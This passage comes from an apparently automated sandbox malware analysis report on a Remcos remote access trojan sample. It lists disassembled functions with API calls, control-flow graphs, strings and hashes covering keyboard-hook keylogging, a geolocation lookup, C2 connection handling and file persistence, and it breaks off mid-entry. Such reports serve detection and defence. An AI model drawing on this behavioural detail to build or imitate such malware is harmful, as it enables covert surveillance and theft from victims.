                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe,00000104), ref: 0040EA29
                                                • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                              • String ID: ,aF$,aF$0C[$8)[$Access Level: $Administrator$C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe$Exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$hhh-AQVE0Z$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                              • API String ID: 2830904901-757035959
                                              • Opcode ID: 812be0f1e7c38ba9f07a1fe3ee97efc8b1479d3c614fe8d7e3374410533dbbc8
                                              • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                              • Opcode Fuzzy Hash: 812be0f1e7c38ba9f07a1fe3ee97efc8b1479d3c614fe8d7e3374410533dbbc8
                                              • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E
                                              Function 0040A2F3 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1260 40a2f3-40a30a 1261 40a30c-40a326 GetModuleHandleA SetWindowsHookExA 1260->1261 1262 40a36e-40a37e GetMessageA 1260->1262 1261->1262 1263 40a328-40a36c GetLastError call 41bc1f call 4052fd call 402093 call 41b580 call 401fd8 1261->1263 1264 40a380-40a398 TranslateMessage DispatchMessageA 1262->1264 1265 40a39a 1262->1265 1266 40a39c-40a3a1 1263->1266 1264->1262 1264->1265 1265->1266
                                              APIs
                                              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                              • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                              • GetLastError.KERNEL32 ref: 0040A328
                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A376
                                              • TranslateMessage.USER32(?), ref: 0040A385
                                              • DispatchMessageA.USER32(?), ref: 0040A390
                                              Strings
                                              • Keylogger initialization failure: error , xrefs: 0040A33C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                              • String ID: Keylogger initialization failure: error
                                              • API String ID: 3219506041-952744263
                                              • Opcode ID: 90b0715fe4a03c7950091ea493cf6ac8be3b9c9bd1286eec6a190886210d1988
                                              • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                              • Opcode Fuzzy Hash: 90b0715fe4a03c7950091ea493cf6ac8be3b9c9bd1286eec6a190886210d1988
                                              • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
                                              Function 0040F7E2 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88sleepCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                • Part of subcall function 00413584: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 004135C2
                                                • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                                              • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                              • ExitProcess.KERNEL32 ref: 0040F905
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseExitOpenProcessQuerySleepValue
                                              • String ID: 5.1.3 Pro$8)[$override$pth_unenc
                                              • API String ID: 2281282204-3512835923
                                              • Opcode ID: 3c8724a3c29de2eacdbba9d0f0ba12620d0f78ae8ad98ca36cdec3b882b37e8a
                                              • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                              • Opcode Fuzzy Hash: 3c8724a3c29de2eacdbba9d0f0ba12620d0f78ae8ad98ca36cdec3b882b37e8a
                                              • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
                                              Function 0041B411 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1324 41b411-41b454 call 4020df call 43bda0 InternetOpenW InternetOpenUrlW 1329 41b456-41b477 InternetReadFile 1324->1329 1330 41b479-41b499 call 4020b7 call 403376 call 401fd8 1329->1330 1331 41b49d-41b4a0 1329->1331 1330->1331 1333 41b4a2-41b4a4 1331->1333 1334 41b4a6-41b4b3 InternetCloseHandle * 2 call 43bd9b 1331->1334 1333->1329 1333->1334 1338 41b4b8-41b4c2 1334->1338
                                              APIs
                                              • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                              • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                              • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                              • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                              • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                              Strings
                                              • http://geoplugin.net/json.gp, xrefs: 0041B448
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$CloseHandleOpen$FileRead
                                              • String ID: http://geoplugin.net/json.gp
                                              • API String ID: 3121278467-91888290
                                              • Opcode ID: 8768e4039a2bc5cc6046070fd40f45c4464c342673b2c5d96ea1c9ae7ef072e0
                                              • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                              • Opcode Fuzzy Hash: 8768e4039a2bc5cc6046070fd40f45c4464c342673b2c5d96ea1c9ae7ef072e0
                                              • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                              Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404F81
                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404FCD
                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                              Strings
                                              • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Create$EventLocalThreadTime
                                              • String ID: KeepAlive | Enabled | Timeout:
                                              • API String ID: 2532271599-1507639952
                                              • Opcode ID: d6bdf093f7aea2e5024bc4ba9810f3b5686ab9589db354a71a8a5fd0b8ad62b9
                                              • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                              • Opcode Fuzzy Hash: d6bdf093f7aea2e5024bc4ba9810f3b5686ab9589db354a71a8a5fd0b8ad62b9
                                              • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                              Function 004338C8 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,005B41C0), ref: 004338DA
                                              • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                              • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Crypt$Context$AcquireRandomRelease
                                              • String ID:
                                              • API String ID: 1815803762-0
                                              • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                              • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                              • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                              • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                              Function 0041B69E Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B6BB
                                              • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Name$ComputerUser
                                              • String ID:
                                              • API String ID: 4229901323-0
                                              • Opcode ID: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                              • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                              • Opcode Fuzzy Hash: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                              • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                              Function 0040F90C Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.3 Pro), ref: 0040F920
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InfoLocale
                                              • String ID:
                                              • API String ID: 2299586839-0
                                              • Opcode ID: 2888965568e38a2ba7a5abe7093904758464576a93ba76aee1c710f175ee0f35
                                              • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                              • Opcode Fuzzy Hash: 2888965568e38a2ba7a5abe7093904758464576a93ba76aee1c710f175ee0f35
                                              • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                              Function 00414F65 Relevance: 55.1, APIs: 5, Strings: 26, Instructions: 809sleepnetworkCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 448 414f65-414fad call 4020df call 41b944 call 4020df call 401e65 call 401fab call 43bb2c 461 414fbc-415008 call 402093 call 401e65 call 4020f6 call 41beac call 40489e call 401e65 call 40b9f8 448->461 462 414faf-414fb6 Sleep 448->462 477 41500a-415079 call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 461->477 478 41507c-415117 call 402093 call 401e65 call 4020f6 call 41beac call 401e65 * 2 call 406c59 call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 461->478 462->461 477->478 531 415127-41512e 478->531 532 415119-415125 478->532 533 415133-4151c5 call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414f24 531->533 532->533 560 415210-41521e call 40482d 533->560 561 4151c7-41520b WSAGetLastError call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 533->561 566 415220-415246 call 402093 * 2 call 41b580 560->566 567 41524b-415260 call 404f51 call 4048c8 560->567 583 415ade-415af0 call 404e26 call 4021fa 561->583 566->583 582 415266-4153b9 call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 4 call 41b871 call 4145f8 call 409097 call 441ed1 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 413733 567->582 567->583 648 4153bb-4153c8 call 405aa6 582->648 649 4153cd-4153f4 call 401fab call 4135e1 582->649 597 415af2-415b12 call 401e65 call 401fab call 43bb2c Sleep 583->597 598 415b18-415b20 call 401e8d 583->598 597->598 598->478 648->649 655 4153f6-4153f8 649->655 656 4153fb-4157ba call 40417e call 40ddc4 call 41bcd3 call 41bdaf call 41bc1f call 401e65 GetTickCount call 41bc1f call 41bb77 call 41bc1f * 2 call 41bb27 call 41bdaf * 5 call 40f90c call 41bdaf call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 649->656 655->656 782 4157bc call 404aa1 656->782 783 4157c1-415a45 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 782->783 901 415a4a-415a51 783->901 902 415a53-415a5a 901->902 903 415a65-415a6c 901->903 902->903 904 415a5c-415a5e 902->904 905 415a78-415aaa call 405a6b call 402093 * 2 call 41b580 903->905 906 415a6e-415a73 call 40b08c 903->906 904->903 917 415aac-415ab8 CreateThread 905->917 918 415abe-415ad9 call 401fd8 * 2 call 401f09 905->918 906->905 917->918 918->583
                                              APIs
                                              • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414FB6
                                              • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                              • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep$ErrorLastLocalTime
                                              • String ID: | $%I64u$,aF$0C[$5.1.3 Pro$8)[$C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$PSG$P[$TLS Off$TLS On $dMG$hhh-AQVE0Z$hlight$name$NG$NG$PG$PG$PG
                                              • API String ID: 524882891-1391770773
                                              • Opcode ID: c7980f48d19d20bc2602edb0b6bf50e77747672025e25e3c16e9fa1a62abbf74
                                              • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                                              • Opcode Fuzzy Hash: c7980f48d19d20bc2602edb0b6bf50e77747672025e25e3c16e9fa1a62abbf74
                                              • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D
                                              Function 0040A761 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                              • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A859
                                                • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                              • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                              • String ID: 0C[$pQG$pQG$xdF$PG$PG
                                              • API String ID: 3795512280-3046255218
                                              • Opcode ID: db686e10471e88e88e6c2a6410797b3bbe7a67903047043a717f9aa792139144
                                              • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                              • Opcode Fuzzy Hash: db686e10471e88e88e6c2a6410797b3bbe7a67903047043a717f9aa792139144
                                              • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E
                                              Function 004048C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1023 4048c8-4048e8 connect 1024 404a1b-404a1f 1023->1024 1025 4048ee-4048f1 1023->1025 1026 404a21-404a2f WSAGetLastError 1024->1026 1027 404a97 1024->1027 1028 404a17-404a19 1025->1028 1029 4048f7-4048fa 1025->1029 1026->1027 1030 404a31-404a34 1026->1030 1031 404a99-404a9e 1027->1031 1028->1031 1032 404926-404930 call 420cf1 1029->1032 1033 4048fc-404923 call 40531e call 402093 call 41b580 1029->1033 1035 404a71-404a76 1030->1035 1036 404a36-404a6f call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 1030->1036 1044 404941-40494e call 420f20 1032->1044 1045 404932-40493c 1032->1045 1033->1032 1041 404a7b-404a94 call 402093 * 2 call 41b580 1035->1041 1036->1027 1041->1027 1058 404950-404973 call 402093 * 2 call 41b580 1044->1058 1059 404987-404992 call 421ad1 1044->1059 1045->1041 1084 404976-404982 call 420d31 1058->1084 1070 4049c4-4049d1 call 420e97 1059->1070 1071 404994-4049c2 call 402093 * 2 call 41b580 call 421143 1059->1071 1081 4049d3-4049f6 call 402093 * 2 call 41b580 1070->1081 1082 4049f9-404a14 CreateEventW * 2 1070->1082 1071->1084 1081->1082 1082->1028 1084->1027
                                              APIs
                                              • connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                              • WSAGetLastError.WS2_32 ref: 00404A21
                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
